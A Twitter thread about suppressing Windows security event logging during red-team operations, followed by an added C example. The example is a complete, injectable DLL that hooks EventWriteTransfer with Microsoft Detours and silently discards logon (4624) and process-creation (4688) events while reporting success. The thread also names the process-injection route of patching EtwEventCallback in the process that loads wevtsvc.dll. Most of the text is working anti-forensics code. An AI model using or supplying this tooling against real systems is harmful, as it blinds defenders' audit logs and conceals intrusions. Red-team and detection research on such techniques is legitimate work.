For all Windows internals people -- anyone know which Windows processes are commonly responsible for event tracing (using evntprov.h)? I'd like to hook EventWriteTransfer as a means of surgically suppressing certain event logging during red team scenarios. 1/?
For example, could it be as easy as identifying the target process, injecting your DLL, using Detours to set the hook with the added logic "if(EventDescriptor->Id == 4624){ return ERROR_SUCCESS; }"? 2/?
I suppose my question is this: does anyone know which process is commonly responsible for the Microsoft-Windows-Security-Auditing event tracing provider?
ANSWER: I found out how to do what I wanted. Here's an awesome article by @_batsec_ blog.dylan.codes/pwning-wind… It turns out that you can just check every process for whether it contains the module wevtsvc.dll. Then you inject into that process and patch EtwEventCallback 5/?
9:36 PM · Jan 14, 2021
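Added example, not code from the thread or from the blog post it links: this is the Detours hook sketched in tweet 2 (return ERROR_SUCCESS from EventWriteTransfer for chosen event IDs, forward everything else), written so the filter itself builds and can be exercised on any platform. The Detours wiring is compiled only on Windows and assumes detours.h/detours.lib from Microsoft Detours are available; the second table entry (4688) and the SuppressesId helper are illustrative additions, not from the thread.

```c
/*
 * Added example (not from the thread). Detours hook on EventWriteTransfer
 * that silently drops selected event IDs and forwards the rest.
 *
 * ShouldSuppressEvent / SUPPRESSED_IDS are plain C and build anywhere.
 * The Detours wiring below is Windows-only and assumes Microsoft Detours
 * (detours.h, detours.lib) is on the include/link path.
 */
#include <stddef.h>
#include <stdint.h>

#ifdef _WIN32
#  include <windows.h>
#  include <evntprov.h>
#  include <detours.h>
#else
/* Minimal stand-ins so the filter compiles off-Windows; layout mirrors evntprov.h. */
typedef uint32_t ULONG;
typedef struct _EVENT_DESCRIPTOR {
    uint16_t Id;
    uint8_t  Version;
    uint8_t  Channel;
    uint8_t  Level;
    uint8_t  Opcode;
    uint16_t Task;
    uint64_t Keyword;
} EVENT_DESCRIPTOR, *PEVENT_DESCRIPTOR;
typedef const EVENT_DESCRIPTOR *PCEVENT_DESCRIPTOR;
#  define ERROR_SUCCESS 0
#endif

/* Event IDs to drop. 4624 (logon) is the one from the thread; 4688 (process
 * creation) is a hypothetical second entry showing the table form. Keep this
 * short: the lookup runs on every event the hooked process emits. */
static const uint16_t SUPPRESSED_IDS[] = { 4624, 4688 };
#define SUPPRESSED_COUNT (sizeof(SUPPRESSED_IDS) / sizeof(SUPPRESSED_IDS[0]))

/* Returns 1 if the event should be swallowed, 0 if it should reach the real
 * EventWriteTransfer. A NULL descriptor is passed through so the provider
 * gets whatever error the real API would have returned. */
int ShouldSuppressEvent(PCEVENT_DESCRIPTOR desc)
{
    size_t i;
    if (desc == NULL)
        return 0;
    for (i = 0; i < SUPPRESSED_COUNT; i++)
        if (desc->Id == SUPPRESSED_IDS[i])
            return 1;
    return 0;
}

/* Convenience wrapper (illustrative) for exercising the filter by ID alone. */
int SuppressesId(uint16_t id)
{
    EVENT_DESCRIPTOR d = {0};
    d.Id = id;
    return ShouldSuppressEvent(&d);
}

#ifdef _WIN32
/* Original function pointer; DetourAttach rewrites it to point at a trampoline. */
static ULONG (WINAPI *Real_EventWriteTransfer)(
    REGHANDLE, PCEVENT_DESCRIPTOR, LPCGUID, LPCGUID, ULONG, PEVENT_DATA_DESCRIPTOR)
    = EventWriteTransfer;

static ULONG WINAPI Hook_EventWriteTransfer(
    REGHANDLE RegHandle, PCEVENT_DESCRIPTOR EventDescriptor, LPCGUID ActivityId,
    LPCGUID RelatedActivityId, ULONG UserDataCount, PEVENT_DATA_DESCRIPTOR UserData)
{
    /* Reporting success without writing is what keeps the drop invisible to the caller. */
    if (ShouldSuppressEvent(EventDescriptor))
        return ERROR_SUCCESS;
    return Real_EventWriteTransfer(RegHandle, EventDescriptor, ActivityId,
                                   RelatedActivityId, UserDataCount, UserData);
}

/* DLL entry point: install the detour when injected, remove it on unload. */
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    (void)hinst; (void)reserved;
    if (DetourIsHelperProcess())
        return TRUE;
    if (reason == DLL_PROCESS_ATTACH) {
        DetourRestoreAfterWith();
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourAttach((PVOID *)&Real_EventWriteTransfer, Hook_EventWriteTransfer);
        return DetourTransactionCommit() == NO_ERROR;
    }
    if (reason == DLL_PROCESS_DETACH) {
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourDetach((PVOID *)&Real_EventWriteTransfer, Hook_EventWriteTransfer);
        DetourTransactionCommit();
    }
    return TRUE;
}
#endif
```

Two things worth checking before relying on this. First, the thread's own conclusion was that the working route was to find the process with wevtsvc.dll loaded and patch EtwEventCallback there; the block above shows the mechanism behind the tweet 2 idea, not that final method. Second, advapi32's EventWriteTransfer export is a forwarder to ntdll!EtwEventWriteTransfer, so confirm in a debugger which address the detour actually lands on: a provider that calls the ntdll routine directly is only covered if the hook sits on the ntdll function.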